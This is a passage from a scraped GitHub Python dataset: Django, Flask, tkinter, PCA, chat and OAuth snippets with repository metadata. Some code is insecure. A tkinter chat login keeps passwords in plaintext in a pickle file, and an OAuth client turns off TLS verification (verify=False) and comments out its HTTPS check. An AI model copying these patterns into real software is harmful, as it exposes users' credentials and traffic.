self.is_valid():\n name = self.cleaned_data.get('name')\n filters['name'] = name\n\n\nclass FeedbackForm(forms.ModelForm):\n class Meta:\n model = Feedback\n fields = ['name', 'email', 'subject', 'message']\n","repo_name":"ErickMwazonga/The-Wema-Academy","sub_path":"thewema/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":4502,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"29067473817","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Jun 23 18:02:59 2016\n\n@author: saber\n\"\"\"\nimport sys\n\nreload(sys) \nsys.setdefaultencoding('utf8')\n\ndef getPARAGRAPH(transcription,dict_total,seuil):\n\n # parcourirs all line\n all_txt = transcription.split('\\n') \n i=0\n tab_sent = []\n dict_sent ={}\n while (i < len(all_txt)): \n \n if len(all_txt[i])!=0: \n dict_sent[i]=all_txt[i]\n if i+1 < len(all_txt): \n taille_line_1 = len(all_txt[i].split(' ')) \n key = all_txt[i].split(' ')[taille_line_1-1]+'\\t'+all_txt[i+1].split(' ')[0]\n if dict_total.has_key(key):\n if dict_total[key]>seuil: \n tab_sent.append(str(i)+'-'+str(i+1)+'-O') \n else: \n tab_sent.append(str(i)+'-'+str(i+1)+'-N')\n else: \n tab_sent.append(str(i)+'-'+str(i+1)+'-N')\n #\n i=i+1\n else:\n i=i+1\n # restructuration de la transcription\n i=0\n is_group = False \n tab_group=[] \n new_sent = '' \n #print(dict_sent)\n #print(tab_sent)\n while(i\", methods=[\"POST\"])\ndef update_washer(id):\n try:\n body = request.get_json()\n washer = Washer.query.get(id)\n washer.name = body['title']\n washer_data = body_to_washer_data_entity(body)\n db.session.add(washer_data)\n db.session.commit()\n return washer.serialize\n except Exception as ex:\n return Response(\n str(ex),\n status=400,\n )\n\n\n@washer_bp.route(\"/getWasher/\", methods=[\"GET\"])\ndef get_service(id):\n try:\n washer = Washer.query.get(id)\n return washer.serialize\n except Exception as ex:\n return Response(\n str(ex),\n status=400,\n )\n\n\n@washer_bp.route(\"/deleteWasher/\", methods=[\"POST\"])\ndef delete_service(id):\n try:\n washer = Washer.query.get(id)\n if (checkOrdersActive(washer.order)):\n washer.isDeleted = True\n db.session.commit()\n return washer.serialize\n raise Exception(\"Order is Active\")\n except Exception as ex:\n return Response(\n str(ex),\n status=400,\n )\n\n\n@washer_bp.route(\"//getWashers\", methods=[\"GET\"])\ndef get_services(washCompany_id):\n args = request.args\n page = args.get('page')\n try:\n washers = Washer.query.filter(Washer.washCompany_id == washCompany_id, Washer.isDeleted == False).order_by(\n Washer.name.asc()).paginate(page=int(page), per_page=10, error_out=False)\n return [i.serialize for i in washers]\n except Exception as ex:\n return Response(\n str(ex),\n status=400,\n )\n\n@washer_bp.route(\"/getWasherOrders/\", methods=[\"GET\"])\ndef get_washer_orders(id):\n orders = Washer.query.get(id).order\n return [order.serialize_washer_orders for order in orders]\n","repo_name":"usachirchikskiy/silly_wash","sub_path":"project/route/WasherRoute.py","file_name":"WasherRoute.py","file_ext":"py","file_size_in_byte":2711,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"11761070990","text":"pens = int(input())\r\nmarkers = int(input())\r\nliquid = float(input())\r\npercent = int(input())\r\ntotal_pens = pens * 5.80\r\ntotal_markers = markers * 7.20\r\ntotal_liquid = liquid * 1.20\r\nsum = total_pens+total_markers+total_liquid\r\ntotal_sum = sum - (sum*percent/100)\r\nprint(total_sum)\r\n","repo_name":"Mitoff/SoftUni-problems","sub_path":"first_steps_in_coding_exercises/supplies_for_school.py","file_name":"supplies_for_school.py","file_ext":"py","file_size_in_byte":282,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"43"} +{"seq_id":"28738874182","text":"from django.test import TestCase\nfrom django.contrib.auth.models import User\nfrom .models import Posts\n\n\nclass BlogTest(TestCase):\n @classmethod\n def setUpTestData(cls):\n testuser1 = User.objects.create_user(username='testuser1', password='testpassword')\n testuser1.save()\n\n testpost = Posts.objects.create(\n author=testuser1, title='test post 1',\n body='test body 1'\n )\n testpost.save()\n\n def test_blog_content(self):\n post = Posts.objects.get(id=1)\n author = f'{post.author}'\n title = f'{post.title}'\n body = f'{post.body}'\n\n self.assertEqual(author, 'testuser1')\n self.assertEqual(title, 'test post 1')\n self.assertEqual(body, 'test body 1')\n","repo_name":"Abdulrehman517/Blog_Api_Project","sub_path":"posts/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":760,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"4039668211","text":"# %%\nfrom sklearn.decomposition import PCA\nfrom sklearn.preprocessing import normalize\nimport scipy.io as sio\nimport matplotlib.image as image\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom PIL import Image\n# %%\nimage = plt.imread(\"cat.jpeg\")\n\n# %%\nimage_np = np.array(image)\nimage_r = image_np[:,:,0]\nimage_g = image_np[:,:,1]\nimage_b = image_np[:,:,2]\n# %%\ndef comp_2d(image_2d): # FUNCTION FOR RECONSTRUCTING 2D MATRIX USING PCA\n\tcov_mat = image_2d - np.mean(image_2d , axis = None)\n\teig_val, eig_vec = np.linalg.eigh(np.cov(cov_mat)) # USING \"eigh\", SO THAT PROPRTIES OF HERMITIAN MATRIX CAN BE USED\n\tp = np.size(eig_vec, axis =None)\n\tidx = np.argsort(eig_val)\n\tidx = idx[::-1]\n\teig_vec = eig_vec[:,idx]\n\teig_val = eig_val[idx]\n\tnumpc = 1 # THIS IS NUMBER OF PRINCIPAL COMPONENTS, YOU CAN CHANGE IT AND SEE RESULTS\n\tif numpc

0:\n\t\teig_vec = eig_vec[:, range(numpc)]\n\tscore = np.dot(eig_vec.T, cov_mat)\n\trecon = np.dot(eig_vec, score) + np.mean(image_2d, axis = None).T # SOME NORMALIZATION CAN BE USED TO MAKE IMAGE QUALITY BETTER\n\trecon_img_mat = np.uint8(np.absolute(recon)) # TO CONTROL COMPLEX EIGENVALUES\n\treturn recon_img_mat\n\nimage_r_recon, image_g_recon, image_b_recon = comp_2d(image_r), comp_2d(image_g), comp_2d(image_b) # RECONSTRUCTING R,G,B COMPONENTS SEPARATELY\nrecon_color_img = np.dstack((image_r_recon, image_g_recon, image_b_recon)) # COMBINING R.G,B COMPONENTS TO PRODUCE COLOR IMAGE\nrecon_color_img = Image.fromarray(recon_color_img)\nrecon_color_img.show()\n\n# %%\n","repo_name":"VinhDevNguyen/Image-Compression","sub_path":"PCA_Image_Compress.py","file_name":"PCA_Image_Compress.py","file_ext":"py","file_size_in_byte":1529,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"71588750849","text":"import tkinter as tk\r\nimport tkinter.font as tkFont\r\n\r\napp = tk.Tk()\r\n\r\napp.winfo_toplevel().title(\"Python Project 5.8\")\r\n\r\napp.geometry(\"640x480\")\r\n\r\nfontStyle = tkFont.Font(family=\"Affirmative\", size=16)\r\n\r\nprojectLabel = tk.Label(app, text=\"The system is idle\", font=fontStyle)\r\n\r\ndef systemOn():\r\n projectLabel.config(text = \"System Running\")\r\n\r\ndef systemOff():\r\n projectLabel.config(text=\"System Off\")\r\n\r\npixelVirtual = tk.PhotoImage(width=1, height=1)\r\n\r\nprojectLabel.pack(side=tk.TOP)\r\n\r\nbuttonOn = tk.Button(app, text=\"System On\", image=pixelVirtual, width=200, height=100, compound=\"c\", command=systemOn)\r\nbuttonOn.place(x=100, y=400)\r\n\r\nbuttonOff = tk.Button(app, text=\"System Off\", image=pixelVirtual, width=200, height=100, compound=\"c\", command=systemOff)\r\nbuttonOff.place(x=340, y=400)\r\n\r\nbuttonExit = tk.Button(app, text=\"EXIT\", command=app.quit)\r\nbuttonExit.pack(side=tk.BOTTOM)\r\n\r\napp.mainloop()","repo_name":"Morty-Lovin/Portfolio","sub_path":"JMortonPYProject5_8/JMortonPYProject5_8.py","file_name":"JMortonPYProject5_8.py","file_ext":"py","file_size_in_byte":919,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"13730116108","text":"#!/bin/python\nimport sys\nfrom algos import *\n\n# Solves the weighted bipartite matching problem\n# The input format is as follows:\n# first line: two numbers representing the number of elements in each partition\n# every other line: a pair of numbers i,j from 1 to n/m representing a connection\n# between node i of the first partition and node j of the second\n# partition\n# followed by another integer representing the weight of that edge\n# Example:\n\n#5 5\n#1 5 10\n#2 1 18\n#2 2 14\n#2 5 9\n#3 5 2\n#4 3 16\n#4 5 10\n#5 2 19\n#5 4 9\n\n\ndef read_graph():\n m, n = map(int, sys.stdin.readline().split())\n g = WeightedAssignmentProblem(max(m, n))\n\n d = sys.stdin.readlines()\n for line in d:\n nodes = line.split()\n g.set_edge(int(nodes[0]) - 1, int(nodes[1]) - 1, int(nodes[2]))\n\n return g\n\n\ng = read_graph()\nshow_pairing(g, munkres_algorithm(g))\n","repo_name":"RicardoBrancas/Advanced-Algorithms","sub_path":"weighted_bipartite_match.py","file_name":"weighted_bipartite_match.py","file_ext":"py","file_size_in_byte":928,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"43"} +{"seq_id":"19441677348","text":"from tika import parser\nimport os\nimport shutil\nimport glob\nimport datetime\n\ndef run(directory):\n # Check to see if the processed folder exists\n x = datetime.datetime.now()\n proc_dir = directory + \"/Processed-\" + x.strftime(\"%G-%m-%d\")\n os.makedirs(proc_dir, exist_ok=True)\n\n # Open the import file\n out_file = open(directory + \"/import-data.csv\", \"w+\")\n\n # Print a header\n print_header(out_file)\n\n # Retrieve all of the files in the current director\n files = glob.glob(directory + '/*.pdf')\n\n # Iterate the reports\n for f in files:\n # Parse the current report\n parse_report(f, out_file)\n\n # Move the current file into the processed folder\n shutil.move(f, proc_dir + \"/\" + os.path.basename(f))\n\n # close the file\n out_file.close()\n\n\ndef parse_report(in_file, out_file):\n raw = parser.from_file(in_file)\n text = raw['content']\n\n # Grab our counts\n data = {\n \"date\": os.path.splitext(os.path.basename(in_file))[0],\n \"invalid\": text.count(\"Invalid\"),\n \"medicine\": text.count(\"Medicine\"),\n \"dental\": text.count(\"Dental\"),\n \"nursing\": text.count(\"Nursing\"),\n \"public\": text.count(\"Public\")\n }\n\n # Output our counts\n print_rows(data, out_file)\n\n\ndef print_header(out_file):\n out_file.write(\"Report Date,\"\n \"School,\"\n \"Count\\n\")\n\n\ndef print_rows(data, out_file):\n out_file.write(f\"{data['date']}, \"\n \"School of Medicine,\"\n f\"{data['medicine']}\\n\")\n\n out_file.write(f\"{data['date']}, \"\n \"School of Dentistry,\"\n f\"{data['dental']}\\n\")\n\n out_file.write(f\"{data['date']}, \"\n \"School of Nursing,\"\n f\"{data['nursing']}\\n\")\n\n out_file.write(f\"{data['date']}, \"\n \"School of Public Health,\"\n f\"{data['public']}\\n\")\n\n out_file.write(f\"{data['date']}, \"\n \"Invalid,\"\n f\"{data['invalid']}\\n\")\n\n\nif __name__ == '__main__':\n test_dir = \"/Users/dking/OneDrive - University of Louisville/Kornhauser/2021/Badge Data/Reports\"\n run(test_dir)\n\n # run(os.getcwd())\n","repo_name":"grimsmath/korn-lenel","sub_path":"tika-parser.py","file_name":"tika-parser.py","file_ext":"py","file_size_in_byte":2212,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"6853265641","text":"import pickle\nfrom tkinter import *\nfrom tkinter.ttk import *\nfrom tkinter import messagebox\nimport socket\nimport threading\nimport os\n\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\n\ndef show_about_info():\n messagebox.showinfo(\"关于\", \"3406\")\n\n\nclass Chat(object):\n def __init__(self):\n self.IP = \"192.168.1.105\"\n\n self.PORT = 9999\n\n self.window = Tk()\n self.window.title(\"3406聊天室\")\n frame = Frame(self.window).pack()\n\n ws = self.window.winfo_screenwidth()\n hs = self.window.winfo_screenheight()\n x = int((ws / 2) - (300 / 2))\n y = int((hs / 2) - (300 / 2))\n self.window.geometry(\"{}x{}+{}+{}\".format(500, 350, x, y))\n self.window.resizable(0, 0)\n\n menu_bar = Menu(self.window)\n self.window.config(menu=menu_bar)\n about_menu = Menu(menu_bar, tearoff=0)\n menu_bar.add_cascade(label=\"选项\", menu=about_menu)\n about_menu.add_command(label=\"关于\", command=show_about_info)\n\n self.text = Text(frame)\n self.text.pack(anchor=W)\n self.text.configure(state=\"disabled\")\n self.entry = Entry(frame)\n self.entry.pack(side=LEFT, expand=YES, fill=X, anchor=W)\n self.entry.focus_force()\n self.entry.bind(\"\", self.send_data)\n self.button = Button(frame, text=\"发送\", command=self.send_data)\n self.button.pack(side=RIGHT, anchor=W)\n\n self.conn()\n self.send_threading = threading.Thread(target=self.send_data, args=(1,))\n self.recive_threading = threading.Thread(target=self.recive_data)\n self.send_threading.setDaemon(True)\n self.recive_threading.setDaemon(True)\n self.send_threading.start()\n self.recive_threading.start()\n\n self.window.mainloop()\n\n def conn(self):\n try:\n s.connect((self.IP, self.PORT))\n except:\n messagebox.showerror(\"Error\", \"错误,服务器未开启!\")\n self.window.destroy()\n\n def recive_data(self):\n # global name\n while True:\n data = s.recv(1024)\n data = data.decode(\"utf-8\")\n print(data)\n\n self.text.configure(state=\"normal\")\n self.text.insert(END, data + \"\\n\")\n self.text.see(END)\n self.text.configure(state=\"disabled\")\n\n def send_data(self, event):\n try:\n data = self.entry.get()\n # print(data)\n if data is not None:\n if os.path.exists(\"name.txt\"):\n with open(\"name.txt\", \"r\") as f:\n name = f.read()\n data = name + \":\" + data\n s.send(data.encode(\"utf-8\"))\n self.entry.delete(0, 'end')\n\n except:\n messagebox.showerror(\"Error\", \"错误,服务器未开启!\")\n quit(1)\n\n\nclass Account(object):\n def __init__(self):\n self.window = Tk()\n self.window.title(\"登陆\")\n self.window.geometry(\"450x300\")\n canvas = Canvas(self.window, height=200, width=500)\n image_file = PhotoImage(file=\"welcome.gif\")\n canvas.create_image(0, 0, anchor=\"nw\", image=image_file)\n canvas.pack(side=\"top\")\n\n Label(self.window, text=\"用户名:\").place(x=50, y=150)\n Label(self.window, text=\"密码:\").place(x=50, y=190)\n\n self.usr_name = StringVar()\n self.usr_name.set(\"在此输入用户名\")\n self.entry_name = Entry(self.window, textvariable=self.usr_name)\n self.entry_name.place(x=\"160\", y=\"150\")\n\n self.usr_pwd = StringVar()\n self.entry_pwd = Entry(self.window, textvariable=self.usr_pwd, show=\"*\")\n self.entry_pwd.place(x=160, y=190)\n\n btn_login = Button(self.window, text=\"登陆\", command=self.usr_login)\n btn_login.place(x=170, y=230)\n btn_sign_up = Button(self.window, text=\"注册\", command=self.usr_sign_up)\n btn_sign_up.place(x=270, y=230)\n\n self.window.mainloop()\n\n def usr_login(self):\n usr_name = self.usr_name.get()\n usr_pwd = self.usr_pwd.get()\n with open(\"name.txt\", \"wb\") as f:\n f.write(self.entry_name.get().encode(\"gbk\"))\n try:\n with open('usrs_info.pickle', 'rb') as usr_file:\n usrs_info = pickle.load(usr_file)\n except FileNotFoundError:\n with open('usrs_info.pickle', 'wb') as usr_file:\n usrs_info = {'admin': 'admin'}\n pickle.dump(usrs_info, usr_file)\n if usr_name in usrs_info:\n if usr_pwd == usrs_info[usr_name]:\n # messagebox.showinfo(title='Welcome', message='How are you? ' + usr_name)\n self.window.destroy()\n Chat()\n else:\n messagebox.showerror(message='密码错误,请重试')\n else:\n is_sign_up = messagebox.askyesno('Welcome', '用户未注册,是否注册?')\n if is_sign_up:\n self.usr_sign_up()\n\n def usr_sign_up(self):\n def sign_to():\n np = new_pwd.get()\n npf = new_pwd_confirm.get()\n nn = new_name.get()\n try:\n with open(\"usrs_info.pickle\", \"rb\") as usr_file:\n exist_usr_info = pickle.load(usr_file)\n if np != npf:\n messagebox.showerror(\"Error\", \"密码必须相同!\")\n elif nn in exist_usr_info:\n messagebox.showerror(\"Error\", \"用户已注册!\")\n else:\n exist_usr_info[nn] = np\n with open(\"usrs_info.pickle\", \"wb\") as usr_file:\n pickle.dump(exist_usr_info, usr_file)\n messagebox.showinfo(\"Welcome\", \"注册成功!\")\n window_sign_up.destroy()\n\n except FileNotFoundError:\n with open('usrs_info.pickle', 'wb') as usr_file:\n usrs_info = {'admin': 'admin'}\n pickle.dump(usrs_info, usr_file)\n\n window_sign_up = Toplevel(self.window)\n window_sign_up.geometry(\"350x200\")\n window_sign_up.title(\"Sign up window\")\n\n new_name = StringVar()\n new_name.set(\"example@python.com\")\n Label(window_sign_up, text=\"用户名: \").place(x=10, y=10)\n entry_new_name = Entry(window_sign_up, textvariable=new_name)\n entry_new_name.place(x=150, y=10)\n\n new_pwd = StringVar()\n Label(window_sign_up, text=\"密码: \").place(x=10, y=50)\n entry_usr_pwd = Entry(window_sign_up, textvariable=new_pwd, show=\"*\")\n entry_usr_pwd.place(x=150, y=50)\n\n new_pwd_confirm = StringVar()\n Label(window_sign_up, text=\"确认密码: \").place(x=10, y=90)\n entry_usr_pwd_confirm = Entry(window_sign_up, textvariable=new_pwd_confirm, show=\"*\")\n entry_usr_pwd_confirm.place(x=150, y=90)\n\n btn_comfirm_sign_up = Button(window_sign_up, text=\"注册\", command=sign_to)\n btn_comfirm_sign_up.place(x=150, y=130)\n\n\nif __name__ == '__main__':\n # Account()\n Chat()\n","repo_name":"morestart/chatting","sub_path":"GUI.py","file_name":"GUI.py","file_ext":"py","file_size_in_byte":7098,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"43"} +{"seq_id":"73279134849","text":"#bot para discord criado como projeto final do Bootcamp DB1 Start\n\n#bibliotecas usadas no projeto\nimport discord\nimport config\nimport asyncio\n\n#iniciando o bot\nintents = discord.Intents.default()\nintents.message_content = True\nclient =discord.Client(intents=intents)\n\n#eventos que o bot irá responder\n@client.event\nasync def on_ready():\n print('online.')\n \n@client.event\nasync def on_message(mensagem):\n if mensagem.author == client.user:\n return\n await mensagem.channel.send('Bem-vindo!')\n\nasync def setup():\n print('Setting up...')\n\nasync def main(): \n await setup()\n await client.start(config.TOKEN)\n\nasyncio.run(main())","repo_name":"zanlucaslaiz/bot_discord_db1Start","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":653,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"30544294577","text":"from typing import List\nfrom twitter import Friend\nfrom folium import Map, FeatureGroup, Marker, Icon\n\n\ndef build_map(friends: List[Friend]) -> Map:\n html_map = Map(zoom_start=5)\n points_fg = FeatureGroup(name=\"Friends\")\n for friend in friends:\n points_fg.add_child(Marker(location=friend.location, popup=friend.username, icon=Icon()))\n html_map.add_child(points_fg)\n\n return html_map\n","repo_name":"amytnyk/TwitterFriend","sub_path":"mapbuilder.py","file_name":"mapbuilder.py","file_ext":"py","file_size_in_byte":407,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"7434176402","text":"from flask import render_template, request, redirect, url_for, abort, flash, jsonify\nfrom . import main\nimport os\n\n# from .forms import [form_name]\nfrom ..models import Teachers\nfrom .. import db, photos\nfrom flask_login import login_required, current_user, logout_user, fresh_login_required\nimport markdown2\n\n# General Application Data\nfrom config import appData\n\n@main.route('/')\n@login_required\ndef index():\n '''\n View root page function that returns the index page \n '''\n title = 'Ndogo Secondary School | Home'\n context = {\n 'title' : title,\n 'appData' : appData,\n 'user' : current_user #Teachers.query.filter_by(id = current_user.id).first()\n }\n return render_template( 'dashboard.html', context = context )\n\n@main.route('/api/all_students')\ndef stud_api():\n '''\n '''\n students = Teachers.query.all()\n return jsonify({ 'data' : students })\n\n@main.route('/user/')\n@login_required\ndef profile(id):\n user = current_user\n title = f'{user.firstName}\\'s profile.'\n context = {\n 'title' : title,\n 'appData' : appData,\n 'user' : user\n }\n if id != user.id:\n return redirect(url_for('main.profile', id = current_user.id))\n return render_template(\"profile/profile.html\", context = context)\n\n\n\n\n\n# @main.route('/user//update',methods = ['GET','POST'])\n# @login_required\n# def update_profile(uname):\n# user = User.query.filter_by(username = uname).first()\n# if user is None:\n# abort(404)\n# form = UpdateProfile()\n# if form.validate_on_submit():\n# user.bio = form.bio.data\n# db.session.add(user)\n# db.session.commit()\n# return redirect(url_for('.profile', uname = user.username ))\n# return render_template('profile/update.html', form = form, user = user )\n","repo_name":"HarryThuku/Group-of-Schools","sub_path":"app/main/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1823,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"18413150591","text":"import json\nfrom pathlib import Path\nimport os\nimport pandas as pd\nimport json\nimport typing\nfrom typing import List, Dict\nfrom argparse import ArgumentParser, Namespace\nfrom pathlib import Path\nfrom random import seed\nids, answers = [], []\n\n\ndef main(args):\n with open(os.path.join(\"ckpt\", \"qa\", \"infer\", \"predict_predictions.json\"), \"r\", encoding=\"utf-8\") as f:\n data = json.load(f)\n for id, ans in data.items():\n ids.append(id)\n answers.append(ans)\n\n df = pd.DataFrame({\n \"id\": ids,\n \"answer\": answers\n })\n\n df.to_csv(args.pred_path, index=False, encoding=\"utf-8\")\n\ndef parse_args() -> Namespace:\n parser = ArgumentParser()\n parser.add_argument(\n \"--pred_path\",\n type=Path,\n help=\"Directory to the final prediction csv.\",\n default=\"./prediction.csv\",\n )\n args = parser.parse_args()\n return args\n\nif __name__ == '__main__':\n args = parse_args()\n main(args)","repo_name":"qqandy0120/ADL21-HW2","sub_path":"get_result.py","file_name":"get_result.py","file_ext":"py","file_size_in_byte":969,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"21185416049","text":"from typing import List\n\nfrom fastapi import APIRouter, Depends, HTTPException\nfrom starlette.status import HTTP_400_BAD_REQUEST\n\nfrom ..schemas import HTTPError\n\nprime_router = APIRouter()\n\n\n# Response model & responses are handy for docs\n@prime_router.get(\"/\", response_model=List[int], responses={HTTP_400_BAD_REQUEST: {\"model\": HTTPError}},\n tags=[\"primes\"])\n@prime_router.get(\"/{lower}/{upper}\", response_model=List[int], responses={HTTP_400_BAD_REQUEST: {\"model\": HTTPError}},\n tags=[\"primes\"])\ndef get_primes(lower: int = 0, upper: int = 10000) -> List[int]:\n if lower > 5000:\n raise HTTPException(status_code=HTTP_400_BAD_REQUEST,\n detail=\"Please don't overload me! Lower should be less than or equal to 5000.\")\n if upper > 50000:\n raise HTTPException(status_code=HTTP_400_BAD_REQUEST,\n detail=\"You exaggerator! Upper should be less than or equal to 50000.\")\n\n p = []\n\n for num in range(lower, upper + 1):\n if num > 1:\n for i in range(2, num):\n if (num % i) == 0:\n break\n else:\n p.append(num)\n\n return p\n","repo_name":"Eslih/basic-webapp","sub_path":"api/app/api/prime.py","file_name":"prime.py","file_ext":"py","file_size_in_byte":1207,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"43"} +{"seq_id":"39946267031","text":"from sqlobject import *\n\nclass Model:\n\tclass Capture(SQLObject):\n\t\tname = StringCol(length = 255)\n\t\tcategory = ForeignKey('Category')\n\t\ttags = RelatedJoin('Tag')\n\t\tpath = StringCol(notNone = True)\n\t\ttimestamp = DateTimeCol(notNone=True)\n\t\tmimetype = StringCol(length = 255, notNone = True) # MIME type of the capture.\n\t\ttype = StringCol(length = 2) # Two-letter representation of the type of capture (screencast, area, window etc)\n\t\turl = StringCol() # Image's URL, if it exists. \n\t\trating = IntCol() # Rating out of five\n\t\tdef _get_data(self):\n\t\t\tf = open(self.path, 'rb')\n\t\t\tdata = image.read()\n\t\t\tf.close()\n\t\t\treturn data\n\t\tdef _set_data(self, value):\n\t\t\tdata = value # clearer variable name\n\t\t\tf = open(self.path, 'w')\n\t\t\tf.write(data)\n\t\t\tf.close()\n\t\t\treturn True\n\t\t\n\tclass Category(SQLObject):\n\t\tname = StringCol(length = 255)\n\t\tparent = IntCol(notNone = False)\n\t\ticon = StringCol()\n\t\t\n\tclass Tag(SQLObject):\n\t\tname = StringCol(length = 255)\n","repo_name":"donaldharvey/snappy","sub_path":"snappy/backend/db/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":947,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"43"} +{"seq_id":"40393323507","text":"\nimport serial\nimport glob\nimport sys\nimport bluetooth\nimport time\n\ndata_dict = {\n \"SN\": 0,\n \"Temp\": 0,\n \"MaxTemp\": 0,\n \"MinTemp\": 0,\n \"Alarm\": 0,\n \"Heater\": 0,\n \"Cooler\": 0,\n \"BatteryVoltage\": 0,\n \"PowerSavingMode\": 0\n}\nclass Connection:\n def __init__(self,Connection):\n self.Connection = Connection\n\nclass SerialPort():\n def __init__(self,port:str,baundrate=9600,time_out=1,Name=\"\"):\n self.port = port\n self.baundrate = baundrate\n self.time_out = time_out\n self.name = \"\"\n self._connection = None\n self._isConnected = False\n self.LastGet = {}\n def Connect(self):\n try:\n self._connection = serial.Serial(self.port,self.baundrate)\n except:\n return \"Connection Fail!!!\"\n else:\n self._isConnected = True\n return \"Connected\"\n \n def Disconnect(self):\n try:\n self._connection.close()\n except:\n return \"Disconnection Fail!!!\"\n else:\n self._isConnected = False\n return \"Disconnected\"\n\n def CheckConnection(self)->bool:\n self._isConnected = self._connection.isOpen()\n return self._isConnected\n\n def GetCommandMessage(self,MaxTemp=200,MinTemp=200,AlarmState=2,HeaterState=2,CoolerState=2,PowerSavingMode=2):\n return bytes(f\"Set+{MaxTemp}+{MinTemp}+{AlarmState}+{HeaterState}+{CoolerState}+{PowerSavingMode}\",\"utf-8\")\n \n\n def SendCommand(self,MaxTemp=200,MinTemp=200,AlarmState=2,HeaterState=2,CoolerState=2,PowerSavingMode=2):\n if self.CheckConnection():\n try:\n self._connection.write(bytes(f\"Set+{MaxTemp}+{MinTemp}+{AlarmState}+{HeaterState}+{CoolerState}+{PowerSavingMode}\",\"utf-8\"))\n except:\n return False\n else:\n return True\n else:\n return False\n def Get(self,Trys = 4):\n if self.CheckConnection():\n self._connection.write(b\"Get+\")\n my_data = \"\"\n Trying = Trys\n while True:\n DATA = self._connection.readline()\n DATA = str(DATA,\"utf-8\")\n DATA = DATA.rstrip()\n data_list = DATA.split(\"+\")\n if data_list[0].isdigit():\n my_data = DATA\n break\n else:\n Trying -= 1\n self._connection.write(b\"Get+\")\n if Trying == 0:\n break\n time.sleep(0.2)\n \n return my_data\n\n def GetTemprature(self):\n if self.CheckConnection():\n self._connection.write(b\"Get+T+\")\n my_data = None\n Trying = 4 \n while True:\n try:\n DATA = self._connection.readline()\n DATA = str(DATA,\"utf-8\")\n data_list = DATA.split(\"+\")\n if len(data_list)>1:\n try:\n my_data = float(data_list[1])\n except:pass\n else:return my_data\n else:\n Trying -= 1\n if Trying == 0:\n break\n time.sleep(0.2)\n return float(my_data[1])\n except:return None\n\n\n\ndef SearchSerialports()->dict:\n if sys.platform.startswith('win'):\n ports = ['COM%s' % (i + 1) for i in range(256)]\n elif sys.platform.startswith('linux') or sys.platform.startswith('cygwin'):\n ports = glob.glob('/dev/tty[A-Za-z]*')\n elif sys.platform.startswith('darwin'):\n ports = glob.glob('/dev/tty.*')\n else:\n raise EnvironmentError('Unsupported platform')\n\n result = dict()\n for port in ports:\n try:\n s = serial.Serial(port)\n s.close()\n result[s.name]=s.get_settings()\n\n except (OSError, serial.SerialException):\n pass\n return result\ndef SearchBluetooths():\n nearby_devices =bluetooth.discover_devices(lookup_names = True)\n return nearby_devices","repo_name":"saniar-mf/digital_thermostat","sub_path":"DesktopApplication/backend/Connection.py","file_name":"Connection.py","file_ext":"py","file_size_in_byte":4197,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"10697488120","text":"from . import utils\r\nimport json\r\nimport requests\r\nimport urllib\r\nimport urllib2\r\nfrom requests.packages import urllib3\r\n\r\n\r\nclass Client(object):\r\n def __init__(self, client_id, client_secret, redirect_uri, \\\r\n authorization_uri, token_uri, openid_uri, user_uri=None):\r\n \"\"\"Constructor for OAuth 2.0 Client.\r\n\r\n :param client_id: Client ID.\r\n :type client_id: str\r\n :param client_secret: Client secret.\r\n :type client_secret: str\r\n :param redirect_uri: Client redirect URI: handle provider response.\r\n :type redirect_uri: str\r\n :param authorization_uri: Provider authorization URI.\r\n :type authorization_uri: str\r\n :param token_uri: Provider token URI.\r\n :type token_uri: str\r\n \"\"\"\r\n self.client_id = client_id\r\n self.client_secret = client_secret\r\n self.redirect_uri = redirect_uri\r\n self.authorization_uri = authorization_uri\r\n self.token_uri = token_uri\r\n self.openid_uri = openid_uri\r\n self.user_uri = user_uri\r\n\r\n def get_user_info(self, access_token, openid):\r\n response = requests.get(\"%sget_user_info/\" %self.user_uri, params=\r\n {'access_token': access_token, 'client_id': self.client_id, \"openid\": openid}, verify=False)\r\n try:\r\n return response.json()\r\n except TypeError:\r\n return response.json\r\n\r\n def get_openid(self, access_token):\r\n response = requests.get(self.openid_uri, params={'access_token': access_token}, verify=False)\r\n try:\r\n return response.json()\r\n except TypeError:\r\n return response.json\r\n\r\n @property\r\n def default_response_type(self):\r\n return 'code'\r\n\r\n @property\r\n def default_grant_type(self):\r\n return 'authorization_code'\r\n\r\n def http_post(self, url, data=None):\r\n \"\"\"POST to URL and get result as a response object.\r\n\r\n :param url: URL to POST.\r\n :type url: str\r\n :param data: Data to send in the form body.\r\n :type data: str\r\n :rtype: requests.Response\r\n \"\"\"\r\n # if not url.startswith('https://'):\r\n # raise ValueError('Protocol must be HTTPS, invalid URL: %s' % url)\r\n return requests.post(url, data, 